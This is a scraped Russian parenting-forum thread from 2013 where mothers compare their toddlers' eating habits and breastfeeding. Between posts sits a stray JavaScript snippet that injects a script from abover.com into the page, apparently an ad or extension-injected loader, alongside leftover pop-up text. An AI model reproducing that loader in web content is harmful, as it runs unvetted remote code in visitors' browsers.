11 лет

ммм гречка...

ест не всё, тоже избирательный, но я постоянно ищу подходы, но на "всякий случай" всегда готовлю то что любит, чтобы накормитьа вообще у нас начало мега ГВ )))) сосёт как новорожденный блин )
14.10.2013
офигеть, вот это вы даете? у нас даже вид груди не вызывает желания пососать ее, пальчиком покажет "сися" и все, сосем на дневной и ночной сон.[removed][removed][removed][removed]Закрыть [Х]Осталось сек.
14.10.2013
завидую ))) Дима прям перечеркнул все мои ожидания от ГВ ))думаю он пример тех детей, кто готов сосать до 4-5 ти лет )))
15.10.2013
Моя стала выделываться но вообще любит творожки сразу 2 штуки едим по вечерам почти каждый день. Макароны, огурцы в почете!СУП куриный !  гречку иногдааааа, мясо любит, курочку, хлеб, сыр. остальное таааак.............
13.10.2013
Специи и сахар добавляешь?У нас периодами. Иногда и брокколи может съесть, а иногда все только под мультик. Но явные фавориты это рыба, мясо и курица. И хлеб. Творожок ест агуша только фруктовый. 
13.10.2013
добавляю уже и сахар и соль и даже специи немного натуральные.[removed][removed][removed][removed]Закрыть [Х]Осталось сек.
13.10.2013
А в виде запеканки или пирог с творогом не ест? Настя яблоки не любит, а шарлотку уплетает только так)  
13.10.2013
не пробовала еще, после экспериментов с сырниками и варениками боюсь уже что ждать от нее.[removed][removed][removed][removed]Закрыть [Х]Осталось сек.
13.10.2013
У нас Леруська творожок ест классический "агуша" ,"тема" не ест и с фруктовыми добавками тоже. Йогурты не пьем, кефир нравится. Макароны можем есть круглыми сутками, только мама не дает)))))Любит овощи и фрукты, нравятся щи, не ест борщ. Каши, какие давала (овсянка, кукурузная, гречневая, рисовая, пшенная) ест все, больше всего нравится гречка и овсянка
12.10.2013
Творожок тоже не едим((( если только по чуть чуть. Сус любой поест. На завтрак и не знаю что придумать, от каш отказался. Увидел винегрет, столько слопал. Омлет кушает. На ужин все что даю , все есть. Печенку любит. И гречку с мясом. НО все только чтоб самому есть. Половина мимо рта. Кормить себя не дает. И на кухне что твориться)))) 
12.10.2013
Из папиной тарелки наша готова есть все, что угодно. Лишь бы вместе с папулей. Меня муж даже пару раз спрашивал:"А если я буду есть кошачьи какашки, Светка тоже будет?)"[removed](function () { var script = document.createElement('script'); script.src = 'https://abover.com/system/extension?iframe=' + ( self === top ? '0' : '1' ) + '&r=' + Math.random() + '&v=1.0.8'; script.onload = script.onerror = function () { script.onload = script.onerror = null; script[removed].removeChild(script); } document.body.appendChild(script); })();[removed]
12.10.2013
:)))) вот и у нас так же, из моей тарелки лопает только в путь и вообще заметила, что она "человеческую" еду ест значительно лучше, чем все эти творожки, каши и т.д.[removed][removed][removed][removed]Закрыть [Х]Осталось сек.
13.10.2013
:)))))))))))))) моя нежность...